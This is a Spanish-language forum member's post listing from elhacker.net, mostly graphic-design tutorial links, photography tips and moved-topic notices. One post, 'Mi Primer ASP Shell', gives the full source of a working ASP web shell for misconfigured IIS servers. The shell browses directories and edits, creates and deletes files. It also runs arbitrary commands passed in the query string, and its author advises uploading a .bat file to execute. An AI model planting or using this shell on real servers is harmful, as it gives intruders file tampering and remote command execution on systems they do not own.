elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Temas
Páginas: 1 [2] 3
11  Media / Diseño Gráfico / Temas y Preguntas Frecuentes en diseño en: 26 Marzo 2005, 11:32 am
TUTORIALES PHOTOSHOP

Inicio en Photoshop :: Manual del Newbie :: por .txt
http://foro.elhacker.net/index.php?topic=11526.0


Reflejar texto

http://foro.elhacker.net/index.php/topic,64298.0.html


Texto de vidrio

http://foro.elhacker.net/index.php/topic,63322.0.html


Tutorial fuego en photoshop

http://foro.elhacker.net/index.php/topic,51219.0.html


crear un brush abstracto en photoshop CS

http://foro.elhacker.net/index.php/topic,62771.0.html

Como hacer una firma (para el foro) en photoshop 7.0
http://foro.elhacker.net/index.php?topic=26259.0 <-- Accolon
http://foro.elhacker.net/index.php?topic=27300.0 <-- Skamilo

Tutorial Efecto Letra Matrix
http://foro.elhacker.net/index.php/topic,65344/prev_next,next.html

Tutorial Efecto de letra con: (blending options)
http://foro.elhacker.net/index.php/topic,65386/prev_next,next.html

Barra de navegacion & botones
http://foro.elhacker.net/index.php/topic,65827.0.htm

TUTORIALES FIREWORKS


Menúes drop down (Fireworks)
http://foro.elhacker.net/index.php/topic,65685.0.html

Lienas distribuidas (Fireworks)
http://foro.elhacker.net/index.php/topic,65668/prev_next,next.html[/b]

Efecto: Lineas de TV
http://foro.elhacker.net/index.php/topic,65698.0.html[/b]

PREGUNTAS FRECUENTES

:: Botones Animados ::
http://foro.elhacker.net/index.php?topic=16915.0

Tutorial Rollover con ImageReady
http://foro.elhacker.net/index.php/topic,64248.0.html

:: ¿Cómo hacer un cargador, loading o preloader en Flash?::
http://foro.elhacker.net/index.php/topic,47669.0.html
http://foro.elhacker.net/index.php/topic,63588.msg290709.html#msg290709

Boton en Flash con Enlace
http://foro.elhacker.net/index.php?topic=29067.0

:: Tutoriales en video de Flash ::
http://foro.elhacker.net/index.php/topic,32706.0

diseños que mata
http://foro.elhacker.net/index.php/topic,25830.0.html

Consejos a la hora del diseño.
http://foro.elhacker.net/index.php/topic,10733.0.html

Como Hacer un banner y no fracasar en el intento.
http://foro.elhacker.net/index.php/topic,6727.0.html

Smiles icon set 1 and 2
http://foro.elhacker.net/index.php/topic,41705.0.html


Cómo abrir una nueva ventana en flash

http://foro.elhacker.net/index.php/topic,62413.0.html
http://foro.elhacker.net/index.php/topic,58623.0.html


Cómo hacer un autorun con flash

http://foro.elhacker.net/index.php/topic,64487.0.html
12  Media / Diseño Gráfico / Consejos básicos para tomar una buena fotografía. en: 9 Marzo 2005, 02:03 am
1.- ¿Cómo encuadrar correctamente?

a. Cuidado con los aires visuales

El aire visual es muy importante al momento de tomar una fotografía, comunica demasiado sobre la intensión y sobre lo que está fuera de cuadro.

Un ejemplo muy claro de aire visual es cuando en alguna película se está llevando un diálogo entre dos personas. El encuadre nunca es al centro, siempre se deja un espacio entre la cara de la persona y el lugar hacia donde ésta está viendo. De tal forma que damos por hecho que fuera de cuadro hay alguien más.

Un ejemplo donde el aire visual se puede usar a la inversa sería cuando queremos expresar que la persona va a salir de cuadro o está dejando algo atrás, lo cual podría dar un tono de indiferencia.

Aquí unos ejemplos muy simples.

13  Media / Diseño Gráfico / MOVIDO: Crear un Explorador Web con Flash en: 1 Marzo 2005, 01:10 am
El tema ha sido movido a Dudas Generales.

http://foro.elhacker.net/index.php?topic=59486.0
14  Media / Diseño Gráfico / MOVIDO: Conexion con base de datos en: 21 Febrero 2005, 13:47 pm
El tema ha sido movido a Dudas Webmasters.

http://foro.elhacker.net/index.php?topic=58434.0
15  Seguridad Informática / Bugs y Exploits / Mi Primer ASP Shell en: 8 Febrero 2005, 04:13 am
Pues vamos al grano... no encontré un buen shell en ASP y decidí hacer uno y de paso practicar mi ASP.
[broma]
(creo que me tardé más en escribir MORRIS con "#" para firmarlo que en hacer el código, jajajaja)
[/broma]

Explota malas configuraciones del IIS.

Espero comentarios, sugerencias, mejoras, errores y testeos.

Morris

Código
  1. <%
  2. Propiedad = "www.elhacker.net"
  3.  
  4. ' Este shell servirá en servidores con una mala configuración si el servidor NO ES vulnerable MANDARA ERRORES
  5. ' Esta herramienta ha sido creada para ayudar a los administradores a probar la configuración de su IIS
  6. ' NO ME HAGO RESPONSABLE POR EL MAL USO QUE SE LE DE A ESTA HERRAMIENTA
  7. ' Cualquier comentario y mejora se agradecerá morris@elhacker.net
  8. ' Este material es educacional y se debe de usar de la misma forma
  9. ' Si encuentras un servidor vulnerable que no sea tuyo, avisa al administrador. El te lo agradecerá.
  10.  
  11. ' http://foro.elhacker.net/index.php/topic,56790.0.html
  12. ' ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
  13. ' ##### ##### ##### ##### VISITANOS EN ##### ##### ##### #####
  14. ' ##### ##### ##### ##### FORO.elhacker.net ##### ##### ##### #####
  15. ' ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
  16.  
  17. ' Code by Morris
  18.  
  19. ' ####       ####    #####    ######    ######    ##     ####
  20. ' ####      #####   #     #   ##    #   ##    #   ##    #
  21. ' ##  #    #   ##   #     #   ## ###    ## ###    ##     #####
  22. ' ##   #  #    ##   #     #   ##  #     ##  #     ##          #
  23. ' ##    #      ##    #####    ##   #    ##   #    ##     #####
  24.  
  25.  
  26. ON ERROR RESUME NEXT
  27. Archivo = "myshell.asp"
  28. Accion = Request.QueryString("Accion")
  29. Path = Request.QueryString("Path")
  30. IF Path = "" THEN
  31. Path = Server.MapPath(".")
  32. END IF
  33. PathFile = Request.QueryString("PathFile")
  34.  
  35. ' Crea instancia del FileSystemObject
  36. Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject")
  37. ' Create el objeto Folder
  38. Set MyFolder=MyFileObject.GetFolder(Path)
  39. 'Loop a través de los folders
  40.  
  41. FUNCTION MapURL(path)
  42. ON ERROR RESUME NEXT
  43.     dim rootPath, url
  44.  
  45.     'Convierte la ruta fisica por una virtual para abrir los archivos
  46.  
  47.     rootPath = Server.MapPath("/")
  48.     url = Right(path, Len(path) - Len(rootPath))
  49.     MapURL = Replace(url, "\", "/")
  50.  
  51. END FUNCTION
  52.  
  53. ' RetVal = Shell("C:\WINDOWS\CALC.EXE", 1)   ' Run Calculator.
  54. 'response.Write(Path)
  55. %>
  56.  
  57. <%
  58. IF Propiedad = "" OR Propiedad <> "www.elhacker.net" THEN
  59. Response.Write("<h1><font color=Red>Maldito lammer no borres la propiedad de este código -  <br>Propiedad www.elhacker.net - foro.elhacker.net</font></h1>")
  60. Response.end
  61. END IF
  62. IF Accion = "Guardar" THEN
  63.  
  64. Set MyOutStream=MyFileObject.OpenTextFile(PathFile, 2, TRUE)
  65.  MyOutStream.Write(Request.Form("texto"))
  66. MyOutStream.Close
  67. %>
  68. La información ha sido guardada.
  69. <br>
  70. <a href="javascript:history.go(-2)">Regresar</a>
  71. <%
  72. END IF
  73.  
  74. IF Accion = "Ejecutar" THEN
  75. On Error Resume Next
  76. Dim Shell, Ejecutar
  77. Set Shell = CreateObject("WScript.Shell")
  78. Archivo = Request.QueryString("Archivo")
  79. Set Ejecutar = Shell.Exec(Archivo)
  80. Do While Ejecutar.Status = 0
  81.     WScript.Sleep 100
  82. Loop
  83. WScript.Echo Ejecutar.Status
  84. Response.Write("done")
  85. END IF
  86.  
  87. IF Accion = "Nuevo" THEN
  88. Archivo = Request.QueryString("Archivo")
  89. IF Archivo = "" THEN
  90. Archivo = "ArchivoNuevo.txt"
  91. END IF
  92.  
  93. Set fso = CreateObject("Scripting.FileSystemObject")
  94. Set MyFile = fso.CreateTextFile(PathFile & "\" & Archivo, True)
  95. MyFile.WriteLine("This is a test.")
  96. MyFile.Close
  97. END IF
  98.  
  99. IF Accion = "Borrar" THEN
  100. Set fso = CreateObject("Scripting.FileSystemObject")
  101. Set MyFile = fso.GetFile(PathFile)
  102. MyFile.Delete
  103. END IF
  104.  
  105. IF Accion = "Editar" THEN%>
  106.  
  107. <form action="<%=Archivo%>?Accion=Guardar&PathFile=<%=PathFile%>" method="post">
  108. <textarea name="texto" cols=100 rows=25>
  109. <%
  110. Set MyTextFile = MyFileObject.OpenTextFile(PathFile)
  111. WHILE NOT MyTextFile.AtEndOfStream
  112. Response.Write( Server.HTMLEncode(MyTextFile.ReadLine) & Chr(10))
  113. WEND
  114. MyTextFile.Close
  115. %>
  116. </textarea>
  117. <BR>
  118. <input type=submit value="Guardar">
  119. </form>
  120.  
  121.  
  122. <%
  123. Response.end
  124. END IF
  125. %>
  126. <HTML>
  127. <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#000000" VLINK="#000000">
  128. <p><BR>
  129.    <B>ASPShell by Morris - Version 1.0 - <a href="http://www.elhacker.net">elhacker.net</a></B><BR>
  130. </p>
  131. <form action="<%=Archivo%>">
  132. <input name="Accion" type="hidden" value="Ruta">
  133. <input name="Path" type="text" id="Path" value="<%=Path%>" size="70">
  134. <input type="submit" value="Ir">
  135. </form>
  136. <br>
  137.  
  138. <TABLE BORDER=0 CELLPADDING=3 CELLSPACING=0 width="100%">
  139. <TR BGCOLOR="#000000">
  140. <TD><FONT COLOR="#FFFFFF"><B>Nombre de Archivo:</B></FONT></TD>
  141. <TD><FONT COLOR="#FFFFFF"><B>Acciones:</B></FONT></TD>
  142. <TD><FONT COLOR="#FFFFFF"><B>Tamaño:</B></FONT></TD>
  143. <TD><FONT COLOR="#FFFFFF"><B>Tipo de archivo:</B></FONT></TD>
  144. <TD><FONT COLOR="#FFFFFF"><B>Fecha de creación:</B></FONT></TD>
  145.  
  146. <%
  147. FOR EACH thing in MyFolder.SubFolders
  148. ON ERROR RESUME NEXT
  149. %>
  150. <TR BGCOLOR="#F7F7E7">
  151. <TD><A HREF="<%=Archivo%>?Path=<%=Path%>\<%=thing.Name%>">[ <%=thing.Name%> ]</A></TD>
  152. <TD></TD>
  153. <TD ALIGN=RIGHT><%=thing.Size%>bytes</TD>
  154. <TD><%=thing.Type%></TD>
  155. <TD><%=thing.DateCreated%></TD>
  156. <%
  157. NEXT
  158. 'Loop a través de los archivos
  159. FOR EACH thing in MyFolder.Files
  160. ON ERROR RESUME NEXT
  161. url = MapURL(thing.path)
  162. %>
  163.  
  164.  
  165. <TR BGCOLOR="#F7F7E7">
  166. <TD><A HREF="<%=Archivo%>?Path=<%=Path%>\<%=thing.Name%>&Accion=Editar"><%=thing.Name%></A></TD>
  167. <TD><A HREF="<%=Archivo%>?Path=<%=Path%>&PathFile=<%=Path%>\<%=thing.Name%>&Accion=Borrar">Borar</A></TD>
  168. <TD ALIGN=RIGHT><%=thing.Size%>bytes</TD>
  169. <TD><%=thing.Type%></TD>
  170. <TD><%=thing.DateCreated%></TD>
  171. <%
  172. NEXT
  173. %>
  174. </TABLE>
  175.  
  176.  
  177. Total de directorios
  178. <%
  179. Response.Write(MyFolder.SubFolders.Count )
  180. %>
  181.  
  182. Total de archivos
  183. <%
  184. Response.Write(MyFolder.Files.Count )
  185. %>
  186. <br><br>
  187. <form name="form1" action="<%=Archivo%>">
  188. <input name="Path" type="hidden" value="<%=Path%>">
  189. <input name="PathFile" type="hidden" value="<%=Path%>">
  190. <input name="Accion" type="hidden" value="Nuevo">
  191.  <input name="Archivo" type="text" id="Archivo" value="Nombre Archivo.ext">
  192.  <input name="Submit" type="submit" value="Nuevo Archivo">
  193. </form>
  194. <strong><font color="#FF0000">Lo más recomendable es subir un .bat y ejecutar ese archivo poniendo la ruta completa hasta el .bat </font></strong>
  195. <form name="form1" action="<%=Archivo%>">
  196. <input name="Path" type="hidden" value="<%=Path%>/archivo.bat">
  197. <input name="PathFile" type="hidden" value="<%=Path%>">
  198. <input name="Accion" type="hidden" value="Ejecutar">
  199.  <input name="Archivo" type="text" id="Archivo" value="<%Path%>">
  200.  <input name="Submit" type="submit" value="Ejecutar">
  201. </form>
  202.  
  203. </BODY>
  204. </HTML>
  205.  
  206. <%
  207. Response.Write("Visitanos en foro.elhacker.net")
  208. %>
  209.  
16  Media / Diseño Gráfico / MOVIDO: tablas usando css de dreamweaver MX en: 27 Enero 2005, 05:47 am
El tema ha sido movido a Dudas Webmasters.

http://foro.elhacker.net/index.php?topic=55223.0
17  Media / Diseño Gráfico / Variable dinámica para Flash desde PHP o ASP por medio del embed en: 19 Enero 2005, 06:33 am
A continuación les pongo un ejemplo de como introducir contenido dinámico a un flash desde PHP o ASP por medio del embed y el param name.

Buscando una forma de introducir mediante un querystring variables a un flash, me encontré un método más simple y que no requiere javascript.

Cuando incrustamos un flash ponemos dentro del tag <object> una serie de parámetros, un par de ellos se refieren a la ruta (para Netscape y otro para Explorer)

Código:
<param name="movie" value="flash.swf">

 <embed src="flash.swf">

Si a estos tag le agregamos un Query String como el siguiente

?color=rojo

Quedando así:

Código:
<param name="movie" value="../flash/header.swf?color=rojo">

 <embed src="../flash/header.swf?color= rojo">

Automáticamente se inserta esa variable dentro de flash y la podemos llamar simplemente nombrándola.

¿Cómo hacerlo dinamicamente?

CON ASP
Código:
<param name="movie" value="../flash/header.swf?color=<% =Variable %>">

 <embed src="../flash/header.swf?color= <% =Variable %>">

CON PHP
Código:
<param name="movie" value="../flash/header.swf?color=<?php echo $Variable?>">

 <embed src="../flash/header.swf?color= <?php echo $Variable?>">


Se pueden anidar más variables mediante el "&"
Código:
?color=red&funcion=uno&url=temporal

Espero sea de utilidad y me haya explicado bien.

Morris
18  Media / Diseño Gráfico / MOVIDO: algun manual sobre visual basic en: 16 Diciembre 2004, 10:15 am
El tema ha sido movido a Programación General.

http://foro.elhacker.net/index.php?topic=50559.0
19  Media / Diseño Gráfico / MOVIDO: Un web de diseño en: 3 Diciembre 2004, 00:27 am
El tema ha sido movido a Dudas Generales.

http://foro.elhacker.net/index.php?topic=49160.0
20  Media / Diseño Gráfico / MOVIDO: Como uso los frames en dreamweaber??? en: 16 Octubre 2004, 02:55 am
El tema ha sido movido a Dudas Webmasters.

http://foro.elhacker.net/index.php?topic=44385.0
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines